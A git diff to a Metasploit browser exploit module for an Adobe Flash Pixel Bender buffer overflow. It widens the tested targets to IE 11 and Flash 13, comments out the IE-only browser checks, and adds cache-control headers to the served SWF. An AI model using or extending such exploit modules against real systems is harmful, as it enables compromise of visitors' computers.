diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
index 43997895ef..9c28caa2f8 100644
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
- has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
- Windows XP SP3, Windows 7 SP1 and Windows 8.
+ has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
+ over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
@@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' =>
{
:source => /script|headers/i,
- :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
- :method => "LoadMovie",
+ #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+ #:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
- :ua_name => Msf::HttpClients::IE,
+ #:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
},
'Targets' =>
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
- send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
@@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
+